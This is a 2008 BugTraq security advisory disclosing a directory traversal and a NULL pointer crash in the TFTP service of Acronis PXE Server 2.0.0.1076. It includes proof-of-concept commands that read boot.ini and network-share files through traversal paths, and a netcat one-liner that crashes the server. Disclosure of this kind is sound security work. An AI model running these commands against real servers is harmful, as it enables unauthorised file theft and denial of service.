BugTraq
Directory traversal and NULL pointer in Acronis PXE Server 2.0.0.1076 Mar 10 2008 09:47PM
Luigi Auriemma (aluigi autistici org)

#######################################################################

Luigi Auriemma

Application: Acronis PXE Server
http://www.acronis.com/enterprise/products/snapdeploy/
Versions: <= 2.0.0.1076
Platforms: Windows
Bugs: A] directory traversal
B] NULL pointer
Exploitation: remote
Date: 08 Mar 2008
Author: Luigi Auriemma
e-mail: aluigi (at) autistici (dot) org [email concealed]
web: aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

The Acronis PXE Server is an essential component of Acronis Snap Deploy
Server, a deployment solution for automatically configuring all the
clients of the local network.

#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

The PXE Server (pxesrv.exe) implements a TFTP server for allowing the
downloading of the bootstrap files (uploading is not allowed).
This service is vulnerable to a classical directory traversal and an
arbitrary path attacks which allow an attacker to download any file
from the local disks or the network shares.

---------------
B] NULL pointer
---------------

An incomplete TFTP request (anything which goes from the simple absence
of the option field to the usage of only the 2 bytes for the opcode)
causes the crashing of the PXE Server due to a NULL pointer access.

#######################################################################

===========
3) The Code
===========

A]
http://aluigi.org/testz/tftpx.zip

tftpx SERVER ..\../..\../boot.ini none
tftpx SERVER c:\boot.ini none
tftpx SERVER \\internal_host\documents\file.txt none

B]
send the bytes 00 01 to UDP port 69 of the server:

echo -n -e \x00\x01|nc SERVER 69 -v -v -u

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus